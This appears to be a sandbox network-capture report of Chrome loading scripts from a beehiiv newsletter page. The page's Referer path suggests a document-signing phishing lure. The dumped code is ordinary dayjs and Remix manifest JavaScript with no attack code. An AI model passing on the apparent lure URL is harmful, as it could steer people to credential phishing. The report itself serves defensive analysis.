                                                                                                                                            Data Ascii: ",S="second",w="minute",O="hour",M="day",H="week",m="month",J="quarter",y="year",_="date",Z="Invalid Date",B=/^(\d{4})[-/]?(\d{1,2})?[-/]?(\d{0,2})[Tt\s]*(\d{1,2})?:?(\d{1,2})?:?(\d{1,2})?[.:]?(\d+)?$/,G=/\[([^\]]+)]|Y{1,4}|M{1,4}|D{1,2}|d{1,4}|H{1,2}|h{1
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 61 72 20 69 3d 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 44 5b 69 5d 26 26 28 65 3d 69 29 2c 74 26 26 28 44 5b 69 5d 3d 74 2c 65 3d 69 29 3b 76 61 72 20 75 3d 6e 2e 73 70 6c 69 74 28 22 2d 22 29 3b 69 66 28 21 65 26 26 75 2e 6c 65 6e 67 74 68 3e 31 29 72 65 74 75 72 6e 20 73 28 75 5b 30 5d 29 7d 65 6c 73 65 7b 76 61 72 20 6f 3d 6e 2e 6e 61 6d 65 3b 44 5b 6f 5d 3d 6e 2c 65 3d 6f 7d 72 65 74 75 72 6e 21 72 26 26 65 26 26 28 6b 3d 65 29 2c 65 7c 7c 21 72 26 26 6b 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 6e 29 7b 69 66 28 46 28 73 29 29 72 65 74 75 72 6e 20 73 2e 63 6c 6f 6e 65 28 29 3b 76 61 72 20 74 3d 74 79 70 65 6f 66 20 6e 3d 3d 22 6f 62 6a 65 63 74 22 3f 6e 3a 7b 7d 3b 72 65 74 75 72 6e 20 74 2e 64 61 74 65 3d 73 2c 74 2e 61 72 67 73 3d 61 72
                                                                                                                                            Data Ascii: ar i=n.toLowerCase();D[i]&&(e=i),t&&(D[i]=t,e=i);var u=n.split("-");if(!e&&u.length>1)return s(u[0])}else{var o=n.name;D[o]=n,e=o}return!r&&e&&(k=e),e||!r&&k},f=function(s,n){if(F(s))return s.clone();var t=typeof n=="object"?n:{};return t.date=s,t.args=ar
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6e 64 4f 66 28 72 29 3c 66 28 74 29 7d 2c 6e 2e 24 67 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 65 29 7b 72 65 74 75 72 6e 20 61 2e 75 28 74 29 3f 74 68 69 73 5b 72 5d 3a 74 68 69 73 2e 73 65 74 28 65 2c 74 29 7d 2c 6e 2e 75 6e 69 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 74 68 69 73 2e 76 61 6c 75 65 4f 66 28 29 2f 31 65 33 29 7d 2c 6e 2e 76 61 6c 75 65 4f 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 64 2e 67 65 74 54 69 6d 65 28 29 7d 2c 6e 2e 73 74 61 72 74 4f 66 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 69 3d 21 21 61 2e 75 28 72 29 7c 7c 72 2c 75 3d 61 2e 70 28 74
                                                                                                                                            Data Ascii: tion(t,r){return this.endOf(r)<f(t)},n.$g=function(t,r,e){return a.u(t)?this[r]:this.set(e,t)},n.unix=function(){return Math.floor(this.valueOf()/1e3)},n.valueOf=function(){return this.$d.getTime()},n.startOf=function(t,r){var e=this,i=!!a.u(r)||r,u=a.p(t
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 70 28 74 29 5d 28 29 7d 2c 6e 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 65 2c 69 3d 74 68 69 73 3b 74 3d 4e 75 6d 62 65 72 28 74 29 3b 76 61 72 20 75 3d 61 2e 70 28 72 29 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 6c 3d 66 28 69 29 3b 72 65 74 75 72 6e 20 61 2e 77 28 6c 2e 64 61 74 65 28 6c 2e 64 61 74 65 28 29 2b 4d 61 74 68 2e 72 6f 75 6e 64 28 64 2a 74 29 29 2c 69 29 7d 3b 69 66 28 75 3d 3d 3d 6d 29 72 65 74 75 72 6e 20 74 68 69 73 2e 73 65 74 28 6d 2c 74 68 69 73 2e 24 4d 2b 74 29 3b 69 66 28 75 3d 3d 3d 79 29 72 65 74 75 72 6e 20 74 68 69 73 2e 73 65 74 28 79 2c 74 68 69 73 2e 24 79 2b 74 29 3b 69 66 28 75 3d 3d 3d 4d 29 72 65 74 75 72 6e 20 6f 28 31 29 3b 69 66 28 75 3d 3d 3d 48 29 72 65 74 75 72 6e 20 6f 28
                                                                                                                                            Data Ascii: p(t)]()},n.add=function(t,r){var e,i=this;t=Number(t);var u=a.p(r),o=function(d){var l=f(i);return a.w(l.date(l.date()+Math.round(d*t)),i)};if(u===m)return this.set(m,this.$M+t);if(u===y)return this.set(y,this.$y+t);if(u===M)return o(1);if(u===H)return o(
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 22 3a 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 63 29 3b 63 61 73 65 22 6d 6d 22 3a 72 65 74 75 72 6e 20 61 2e 73 28 63 2c 32 2c 22 30 22 29 3b 63 61 73 65 22 73 22 3a 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 72 2e 24 73 29 3b 63 61 73 65 22 73 73 22 3a 72 65 74 75 72 6e 20 61 2e 73 28 72 2e 24 73 2c 32 2c 22 30 22 29 3b 63 61 73 65 22 53 53 53 22 3a 72 65 74 75 72 6e 20 61 2e 73 28 72 2e 24 6d 73 2c 33 2c 22 30 22 29 3b 63 61 73 65 22 5a 22 3a 72 65 74 75 72 6e 20 75 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 24 29 7c 7c 75 2e 72 65 70 6c 61 63 65 28 22 3a 22 2c 22 22 29 7d 29 7d 2c 6e 2e 75 74 63 4f 66 66 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 31 35 2a 2d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 24 64 2e 67 65 74 54 69
                                                                                                                                            Data Ascii: ":return String(c);case"mm":return a.s(c,2,"0");case"s":return String(r.$s);case"ss":return a.s(r.$s,2,"0");case"SSS":return a.s(r.$ms,3,"0");case"Z":return u}return null}($)||u.replace(":","")})},n.utcOffset=function(){return 15*-Math.round(this.$d.getTi
                                                                                                                                            2025-01-15 18:14:32 UTC201INData Raw: 20 66 28 31 65 33 2a 73 29 7d 2c 66 2e 65 6e 3d 44 5b 6b 5d 2c 66 2e 4c 73 3d 44 2c 66 2e 70 3d 7b 7d 2c 66 7d 29 7d 28 4e 29 29 2c 4e 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 74 74 3d 58 28 29 3b 63 6f 6e 73 74 20 72 74 3d 4b 28 74 74 29 3b 65 78 70 6f 72 74 7b 72 74 20 61 73 20 64 2c 58 20 61 73 20 72 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 64 61 79 6a 73 2e 6d 69 6e 2d 42 38 43 66 67 41 68 55 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 37 37 35 39 39 62 38 63 2d 66 62 31 36 2d 35 64 34 36 2d 38 35 66 32 2d 38 38 35 31 39 63 61 62 66 38 30 31 0a
                                                                                                                                            Data Ascii: f(1e3*s)},f.en=D[k],f.Ls=D,f.p={},f})}(N)),N.exports}var tt=X();const rt=K(tt);export{rt as d,X as r};//# sourceMappingURL=dayjs.min-B8CfgAhU.js.map//# debugId=77599b8c-fb16-5d46-85f2-88519cabf801


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.1649721104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:32 UTC553OUTGET /assets/manifest-bfc7ba9e.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:32 UTC899INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:32 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 45064
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"b008-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d89679720f79-EWR
                                                                                                                                            2025-01-15 18:14:32 UTC470INData Raw: 77 69 6e 64 6f 77 2e 5f 5f 72 65 6d 69 78 4d 61 6e 69 66 65 73 74 3d 7b 22 65 6e 74 72 79 22 3a 7b 22 6d 6f 64 75 6c 65 22 3a 22 2f 61 73 73 65 74 73 2f 65 6e 74 72 79 2e 63 6c 69 65 6e 74 2d 43 75 42 73 6e 6b 2d 31 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6a 73 78 2d 72 75 6e 74 69 6d 65 2d 42 6a 47 5f 7a 56 31 57 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 41 70 70 47 6c 6f 62 61 6c 73 2d 32 42 72 2d 38 62 5a 73 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 64 61 79 6a 73 2e 6d 69 6e 2d 42 38 43 66 67 41 68 55 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 64 66 55 5f 5a 4b 61 57 2e 6a 73 22 2c 22 2f 61 73 73 65
                                                                                                                                            Data Ascii: window.__remixManifest={"entry":{"module":"/assets/entry.client-CuBsnk-1.js","imports":["/assets/index-D6da9p6-.js","/assets/jsx-runtime-BjG_zV1W.js","/assets/AppGlobals-2Br-8bZs.js","/assets/dayjs.min-B8CfgAhU.js","/assets/performance-dfU_ZKaW.js","/asse
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 66 61 6c 73 65 2c 22 68 61 73 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 22 3a 74 72 75 65 2c 22 6d 6f 64 75 6c 65 22 3a 22 2f 61 73 73 65 74 73 2f 72 6f 6f 74 2d 43 35 4d 6e 5f 75 48 2d 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6a 73 78 2d 72 75 6e 74 69 6d 65 2d 42 6a 47 5f 7a 56 31 57 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 41 70 70 47 6c 6f 62 61 6c 73 2d 32 42 72 2d 38 62 5a 73 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 64 61 79 6a 73 2e 6d 69 6e 2d 42 38 43 66 67 41 68 55 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 64 66 55 5f 5a 4b 61 57 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 31 38 6e 65 78 74 2d
                                                                                                                                            Data Ascii: false,"hasErrorBoundary":true,"module":"/assets/root-C5Mn_uH-.js","imports":["/assets/index-D6da9p6-.js","/assets/jsx-runtime-BjG_zV1W.js","/assets/AppGlobals-2Br-8bZs.js","/assets/dayjs.min-B8CfgAhU.js","/assets/performance-dfU_ZKaW.js","/assets/i18next-
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6c 30 4a 6a 43 4f 52 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 70 6f 70 6f 76 65 72 2d 43 56 31 4a 2d 46 46 70 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 49 55 2d 48 72 73 31 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 75 73 65 53 65 74 4c 61 73 74 56 69 65 77 65 64 52 65 73 6f 75 72 63 65 2d 42 65 6c 52 6f 4b 69 36 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 63 70 4e 6b 2d 4f 49 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 43 68 65 76 72 6f 6e 44 6f 77 6e 49 63 6f 6e 2d 43 43 79 77 70 54 33 6d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 58 4d 61 72 6b 49 63 6f 6e 2d 59 32 74 4f 33 59 6b 67 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 70 6e 46 78 4f 61 61 63 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64
                                                                                                                                            Data Ascii: l0JjCOR.js","/assets/popover-CV1J-FFp.js","/assets/index-DIU-Hrs1.js","/assets/useSetLastViewedResource-BelRoKi6.js","/assets/index-DcpNk-OI.js","/assets/ChevronDownIcon-CCywpT3m.js","/assets/XMarkIcon-Y2tO3Ykg.js","/assets/index-pnFxOaac.js","/assets/ind
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 63 72 69 62 65 72 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 6c 30 73 4e 52 4e 4b 5a 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 72 6f 75 74 65 73 2f 5f 5f 61 63 74 69 6f 6e 73 2f 75 70 64 61 74 65 5f 73 75 62 73 63 72 69 62 65 72 5f 70 72 65 66 65 72 65 6e 63 65 22 3a 7b 22 69 64 22 3a 22 72 6f 75 74 65 73 2f 5f 5f 61 63 74 69 6f 6e 73 2f 75 70 64 61 74 65 5f 73 75 62 73 63 72 69 62 65 72 5f 70 72 65 66 65 72 65 6e 63 65 22 2c 22 70 61 72 65 6e 74 49 64 22 3a 22 72 6f 6f 74 22 2c 22 70 61 74 68 22 3a 22 75 70 64 61 74 65 5f 73 75 62 73 63 72 69 62 65 72 5f 70 72 65 66 65 72 65 6e 63 65 22 2c 22 68 61 73 41 63 74 69 6f 6e 22 3a 74 72 75 65 2c 22 68 61 73 4c 6f 61 64 65 72 22
                                                                                                                                            Data Ascii: criber_organization_subscription-l0sNRNKZ.js","imports":[],"css":[]},"routes/__actions/update_subscriber_preference":{"id":"routes/__actions/update_subscriber_preference","parentId":"root","path":"update_subscriber_preference","hasAction":true,"hasLoader"
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 44 6d 79 57 46 77 75 6f 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 64 65 73 63 72 69 70 74 69 6f 6e 2d 42 6b 6c 4f 58 62 46 2d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 43 71 4a 4e 38 69 51 71 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 46 6f 72 6d 53 75 62 6d 69 73 73 69 6f 6e 4d 65 73 73 61 67 65 2d 53 79 68 52 43 69 48 57 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 64 69 61 6c 6f 67 2d 43 74 70 48 76 76 66 44 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 75 73 65 54 6f 61 73 74 2d 44 4b 34 32 75 46 30 37 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 6a 38 44 34 34 31 69 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 54 74 75 49 6a 7a 2d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6c 61 62 65 6c 2d 43 47 68 49 43
                                                                                                                                            Data Ascii: DmyWFwuo.js","/assets/description-BklOXbF-.js","/assets/index-CqJN8iQq.js","/assets/FormSubmissionMessage-SyhRCiHW.js","/assets/dialog-CtpHvvfD.js","/assets/useToast-DK42uF07.js","/assets/index-Dj8D441i.js","/assets/index-DTtuIjz-.js","/assets/label-CGhIC
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 42 62 6e 54 7a 65 4c 66 2e 6a 73 22 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 72 6f 75 74 65 73 2f 5f 5f 6c 6f 61 64 65 72 73 2f 70 61 67 69 6e 61 74 65 64 5f 61 75 74 68 6f 72 5f 70 6f 73 74 73 22 3a 7b 22 69 64 22 3a 22 72 6f 75 74 65 73 2f 5f 5f 6c 6f 61 64 65 72 73 2f 70 61 67 69 6e 61 74 65 64 5f 61 75 74 68 6f 72 5f 70 6f 73 74 73 22 2c 22 70 61 72 65 6e 74 49 64 22 3a 22 72 6f 6f 74 22 2c 22 70 61 74 68 22 3a 22 70 61 67 69 6e 61 74 65 64 5f 61 75 74 68 6f 72 5f 70 6f 73 74 73 22 2c 22 68 61 73 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 4c 6f 61 64 65 72 22 3a 74 72 75 65 2c 22 68 61 73 43 6c 69 65 6e 74 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 43 6c 69 65 6e 74 4c 6f 61 64
                                                                                                                                            Data Ascii: s","/assets/index-BbnTzeLf.js"],"css":[]},"routes/__loaders/paginated_author_posts":{"id":"routes/__loaders/paginated_author_posts","parentId":"root","path":"paginated_author_posts","hasAction":false,"hasLoader":true,"hasClientAction":false,"hasClientLoad
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 22 2c 22 2f 61 73 73 65 74 73 2f 6a 73 78 2d 72 75 6e 74 69 6d 65 2d 42 6a 47 5f 7a 56 31 57 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 78 32 64 61 5f 7a 63 76 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 63 6f 6e 74 65 78 74 2d 43 78 66 4f 73 5f 39 4c 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 75 73 65 2d 69 73 2d 6d 6f 75 6e 74 65 64 2d 42 61 48 76 31 36 62 42 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 62 75 67 73 2d 44 56 51 7a 42 68 2d 73 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 74 72 61 6e 73 69 74 69 6f 6e 2d 79 2d 35 58 46 46 75 75 2e
                                                                                                                                            Data Ascii: ","/assets/jsx-runtime-BjG_zV1W.js","/assets/index-x2da_zcv.js","/assets/context-CxfOs_9L.js","/assets/keyboard-CaEu2o0u.js","/assets/use-is-mounted-BaHv16bB.js","/assets/bugs-DVQzBh-s.js","/assets/useTranslation-CfKJAmGY.js","/assets/transition-y-5XFFuu.
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 68 61 73 43 6c 69 65 6e 74 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 43 6c 69 65 6e 74 4c 6f 61 64 65 72 22 3a 66 61 6c 73 65 2c 22 68 61 73 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 22 3a 66 61 6c 73 65 2c 22 6d 6f 64 75 6c 65 22 3a 22 2f 61 73 73 65 74 73 2f 6d 61 6e 61 67 65 2d 42 43 75 55 5f 31 54 57 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 63 6f 6e 74 65 78 74 2d 43 78 66 4f 73 5f 39 4c 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 75 73 65
                                                                                                                                            Data Ascii: hasClientAction":false,"hasClientLoader":false,"hasErrorBoundary":false,"module":"/assets/manage-BCuU_1TW.js","imports":["/assets/index-D6da9p6-.js","/assets/components-Oj2xMfGE.js","/assets/context-CxfOs_9L.js","/assets/keyboard-CaEu2o0u.js","/assets/use
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 61 64 65 72 22 3a 74 72 75 65 2c 22 68 61 73 43 6c 69 65 6e 74 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 43 6c 69 65 6e 74 4c 6f 61 64 65 72 22 3a 66 61 6c 73 65 2c 22 68 61 73 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 22 3a 66 61 6c 73 65 2c 22 6d 6f 64 75 6c 65 22 3a 22 2f 61 73 73 65 74 73 2f 63 6f 6d 6d 65 6e 74 5f 6c 69 6b 65 2d 43 42 77 31 61 58 65 45 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 22 2f 61 73 73 65 74 73 2f 6a 73 78 2d 72 75 6e 74 69 6d 65 2d 42 6a 47 5f 7a 56 31 57 2e 6a 73 22 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 72 6f 75 74 65 73 2f 5f 5f 61 63 74 69 6f 6e 73 2f 70 6f 73 74 5f 73 75 62 73 63 72 69 62 65 5f 66 6f 72 6d 22 3a 7b 22 69 64 22 3a 22 72 6f 75 74 65 73 2f 5f 5f 61 63 74 69 6f 6e 73 2f 70 6f 73 74 5f 73 75 62
                                                                                                                                            Data Ascii: ader":true,"hasClientAction":false,"hasClientLoader":false,"hasErrorBoundary":false,"module":"/assets/comment_like-CBw1aXeE.js","imports":["/assets/jsx-runtime-BjG_zV1W.js"],"css":[]},"routes/__actions/post_subscribe_form":{"id":"routes/__actions/post_sub
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 74 65 6e 64 65 64 5f 66 65 65 64 62 61 63 6b 2d 6c 30 73 4e 52 4e 4b 5a 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 72 6f 75 74 65 73 2f 5f 5f 6c 6f 61 64 65 72 73 2f 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 70 6f 73 74 73 22 3a 7b 22 69 64 22 3a 22 72 6f 75 74 65 73 2f 5f 5f 6c 6f 61 64 65 72 73 2f 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 70 6f 73 74 73 22 2c 22 70 61 72 65 6e 74 49 64 22 3a 22 72 6f 6f 74 22 2c 22 70 61 74 68 22 3a 22 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 70 6f 73 74 73 22 2c 22 68 61 73 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 4c 6f 61 64 65 72 22 3a 74 72 75 65 2c 22 68 61 73 43 6c 69 65 6e 74 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 43 6c 69 65 6e 74 4c 6f 61 64 65 72 22 3a 66
                                                                                                                                            Data Ascii: tended_feedback-l0sNRNKZ.js","imports":[],"css":[]},"routes/__loaders/recommended_posts":{"id":"routes/__loaders/recommended_posts","parentId":"root","path":"recommended_posts","hasAction":false,"hasLoader":true,"hasClientAction":false,"hasClientLoader":f


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.1649724104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC846OUTGET /assets/performance-dfU_ZKaW.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC915INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 84340
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"14974-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4160
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d898f995de92-EWR
